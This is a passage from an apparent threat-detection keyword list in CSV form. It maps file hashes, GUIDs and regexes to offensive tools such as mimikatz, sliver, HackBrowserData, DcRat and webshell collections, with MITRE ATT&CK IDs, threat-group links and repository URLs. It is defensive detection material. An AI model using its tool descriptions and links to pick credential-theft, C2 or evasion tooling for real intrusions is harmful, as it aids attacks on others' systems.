"*b241d58192f46cf9b508518c1a31062b50731226100391b0dfa21b929c1a1f16*",".{0,1000}b241d58192f46cf9b508518c1a31062b50731226100391b0dfa21b929c1a1f16.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34547"
"*b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e*",".{0,1000}b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34549"
"*b256ce69db7a774dc39ccef3b0281135b3fc57b7c7826322ed6736ec5259839a*",".{0,1000}b256ce69db7a774dc39ccef3b0281135b3fc57b7c7826322ed6736ec5259839a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34550"
"*b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b*",".{0,1000}b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34551"
"*b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d*",".{0,1000}b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34552"
"*b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44*",".{0,1000}b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34554"
"*b262b397386f413b6b815b409d54a9c5ae65dc0730c3d9918132a23f3d99a1da*",".{0,1000}b262b397386f413b6b815b409d54a9c5ae65dc0730c3d9918132a23f3d99a1da.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34555"
"*b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59*",".{0,1000}b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","34556"
"*b264796db3513dbee419561215cb7c5863d70088dd5e8286829801bc72c27d0b*",".{0,1000}b264796db3513dbee419561215cb7c5863d70088dd5e8286829801bc72c27d0b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34557"
"*b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd*",".{0,1000}b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","34558"
"*b270e67a46481326734fafba78c9ba47d645754b98986d56b053d76cfc649467*",".{0,1000}b270e67a46481326734fafba78c9ba47d645754b98986d56b053d76cfc649467.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34559"
"*b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f*",".{0,1000}b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34561"
"*b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f*",".{0,1000}b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34562"
"*b280f4b1b67ec990eb9522eb93f9d04825e0b31ff183d9f4df9b6db89ed832a9*",".{0,1000}b280f4b1b67ec990eb9522eb93f9d04825e0b31ff183d9f4df9b6db89ed832a9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34564"
"*b286fd04310a342dffe4306712f8d0cddcb3c44e8c0c07e8be14bffc87cd26d0*",".{0,1000}b286fd04310a342dffe4306712f8d0cddcb3c44e8c0c07e8be14bffc87cd26d0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34566"
"*b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd*",".{0,1000}b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34567"
"*B2924789-9912-4B6F-8F7B-53240AC3BA0E*",".{0,1000}B2924789\-9912\-4B6F\-8F7B\-53240AC3BA0E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","#GUIDproject","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","34569"
"*b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e*",".{0,1000}b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","34570"
"*b2956027022f69baa93e6c55c69df6ace602d6ad61cb4ddfdaedd4c9be46d7b6*",".{0,1000}b2956027022f69baa93e6c55c69df6ace602d6ad61cb4ddfdaedd4c9be46d7b6.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34571"
"*b297813bf0834ce143142bd53ca142e54844abd57c60ee01279a2171f32fdb77*",".{0,1000}b297813bf0834ce143142bd53ca142e54844abd57c60ee01279a2171f32fdb77.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","34572"
"*b2992ba236d1f4cffb77149e3c67a19d59f8131249e3ffc16b791ec2522b9629*",".{0,1000}b2992ba236d1f4cffb77149e3c67a19d59f8131249e3ffc16b791ec2522b9629.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34573"
"*b29c1de4f6292cd455141ceec781f9b83461996486aea93a11f7804c6af5477b*",".{0,1000}b29c1de4f6292cd455141ceec781f9b83461996486aea93a11f7804c6af5477b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34574"
"*b2a02c9a9eb70c92a0af31a0485b345375b545a639f01e3cba8bdb5b09149662*",".{0,1000}b2a02c9a9eb70c92a0af31a0485b345375b545a639f01e3cba8bdb5b09149662.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34575"
"*b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa*",".{0,1000}b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","34576"
"*b2a71ab4206470ed4091b90dc0541a8f9dd22ecf3c8db02997f29d407d5c317a*",".{0,1000}b2a71ab4206470ed4091b90dc0541a8f9dd22ecf3c8db02997f29d407d5c317a.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34577"
"*b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c*",".{0,1000}b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","34578"
"*b2ad37703c99fcd399e6213bd26cbffe2c6a72d5f8d8bc32b455af42fa002fab*",".{0,1000}b2ad37703c99fcd399e6213bd26cbffe2c6a72d5f8d8bc32b455af42fa002fab.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34579"
"*b2ae884a70f15e40d4a5ceaaf5609c20422f524eb3f1f25ea14c57bfce64220f*",".{0,1000}b2ae884a70f15e40d4a5ceaaf5609c20422f524eb3f1f25ea14c57bfce64220f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34580"
"*b2b19b7cfc5f45ffcd83e6a099c40ba085cb86c4ab0ac4d0d4ad6aa8e0f40c4c*",".{0,1000}b2b19b7cfc5f45ffcd83e6a099c40ba085cb86c4ab0ac4d0d4ad6aa8e0f40c4c.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34582"
"*b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442*",".{0,1000}b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34583"
"*b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442*",".{0,1000}b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34584"
"*b2b3853690de7ac7089834b95a6aaf107baa61d6f85d3c941abd67f2b8540020*",".{0,1000}b2b3853690de7ac7089834b95a6aaf107baa61d6f85d3c941abd67f2b8540020.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","34585"
"*B2B4238B-1055-4679-B7D5-7CCE2397098E*",".{0,1000}B2B4238B\-1055\-4679\-B7D5\-7CCE2397098E.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#GUIDproject","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","34586"
"*b2b8156b03d2f5abf54642ed17a3d128598debfdce435fb61e5572507d1b131e*",".{0,1000}b2b8156b03d2f5abf54642ed17a3d128598debfdce435fb61e5572507d1b131e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34588"
"*b2bb856a232072bbf9dc478fdb3a0fbdf394057ce255ab586d8ea7e34fa2abc0*",".{0,1000}b2bb856a232072bbf9dc478fdb3a0fbdf394057ce255ab586d8ea7e34fa2abc0.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","34589"
"*b2bb8f3b4b3d50a2a26a0c48fad1a01f9d65ebb7c6a5e6dcd374408fdbc64257*",".{0,1000}b2bb8f3b4b3d50a2a26a0c48fad1a01f9d65ebb7c6a5e6dcd374408fdbc64257.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34590"
"*b2c11ff250d4ece261e20ab73f7aeb22222698c365aa0752aa3d8a5785be8ed1*",".{0,1000}b2c11ff250d4ece261e20ab73f7aeb22222698c365aa0752aa3d8a5785be8ed1.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","34591"
"*b2c357a06c797a0f3fcc6f7995abe577df9b7384e794446022cd6a8dde2d9444*",".{0,1000}b2c357a06c797a0f3fcc6f7995abe577df9b7384e794446022cd6a8dde2d9444.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34592"
"*b2c88487cd1743d186abb8823fdcc4046afea83d850521aef26f753c1c790d7b*",".{0,1000}b2c88487cd1743d186abb8823fdcc4046afea83d850521aef26f753c1c790d7b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34593"
"*b2c89ea8b521f8982b315e7e077aedb5f0f1a1cfdc6d5439b990a731d66c005c*",".{0,1000}b2c89ea8b521f8982b315e7e077aedb5f0f1a1cfdc6d5439b990a731d66c005c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34594"
"*B2D22DC6-1CA5-4CE3-9756-3673336705FB*",".{0,1000}B2D22DC6\-1CA5\-4CE3\-9756\-3673336705FB.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","34596"
"*b2d5cf34fa343ceb5f73db00d1b647722e871c4489d917e80db438c7b926d45a*",".{0,1000}b2d5cf34fa343ceb5f73db00d1b647722e871c4489d917e80db438c7b926d45a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34597"
"*b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6*",".{0,1000}b2e2d49036ddaebaab3cbcd26b3d1742fca27ce42926f2fbb10791ce8af6f2a6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34599"
"*b2f54ca92d09074aaebf19ee7e0c6078075a43c269a4cc045e508d041c2b1e50*",".{0,1000}b2f54ca92d09074aaebf19ee7e0c6078075a43c269a4cc045e508d041c2b1e50.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34602"
"*b2xtranslator.xls.csproj*",".{0,1000}b2xtranslator\.xls\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","34604"
"*b305da79a7ce7057b89449f9113577f0e3e0a2a5ecc67299a806b56b65418856*",".{0,1000}b305da79a7ce7057b89449f9113577f0e3e0a2a5ecc67299a806b56b65418856.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#filehash","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","34605"
